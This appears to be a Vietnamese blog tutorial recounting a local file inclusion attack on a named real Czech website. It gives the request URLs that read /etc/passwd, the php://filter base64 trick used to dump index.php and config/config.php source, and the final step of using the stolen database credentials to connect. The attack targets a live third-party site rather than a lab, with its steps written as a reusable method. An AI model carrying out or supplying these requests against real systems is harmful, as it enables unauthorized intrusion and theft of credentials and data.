Tutorial : LFI php://filter

Chủ Nhật, 3 tháng 2, 2013 |
0

Victim:http://www.hctjstbk.cz/
Bước 1: Tìm link bị lỗi LFI
http://www.hctjstbk.cz/index.php?page=/etc/passwd


Bước 2: Kiểm tra qua /proc/self/environ -> Không được
php://input -> Không được
php://filter/convert.base64-encode/resource=index.php -> okie
Bước 3: Do website mã hóa dùng php://filter file index.php
http://www.hctjstbk.cz/index.php?pag...x.php&soutez=2
[IMG]

This image has been resized.Click to view original image
[/IMG]

Bước 4: View Source copy đoạn mã hóa của file index.php-> vào website giải mã base64 online ở đây mình dùng website
http://www.rbl.jp/base64.php
[IMG]
This image has been resized.Click to view original image
[/IMG]
Bước 5: Sau khi giải mã file index.php để ý đoạn sau config/config.php
Bước 6: php filter file config/config.php
http://www.hctjstbk.cz/index.php?pag...g.php&soutez=2

Viewsource giải mã được database như sau
[IMG]
This image has been resized.Click to view original image
[/IMG]
Bước 7: Connect DB

End tut kakavn_85

Tin mới cập nhật
Bài viết liên quan

Copyright 2011 - 2012 CLOVER NEWS
Nội dung trên được chúng tôi tổng hợp từ nhiều nguồn trên internet.
Thông tin mã nguồnCLOVER NEWS
Website sử dụng mã nguồn XML Blogger
Code XML by: Nguyễn Mạnh Đạt (DNMsuper)
Email: datnguyen1297@gmail.com
Y!M: dnmsuper

Liên hệ quảng cáo:
Email: datnguyen1297@gmail.com
Y!M: dnmsuper